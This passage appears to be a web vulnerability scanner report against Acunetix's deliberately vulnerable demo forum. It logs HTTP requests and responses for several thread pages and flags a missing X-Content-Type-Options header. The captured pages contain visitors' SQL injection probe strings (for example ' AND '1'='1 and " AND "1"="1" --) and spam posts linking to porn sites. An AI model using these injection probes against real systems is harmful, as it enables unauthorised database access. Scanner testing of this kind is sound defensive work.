class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" 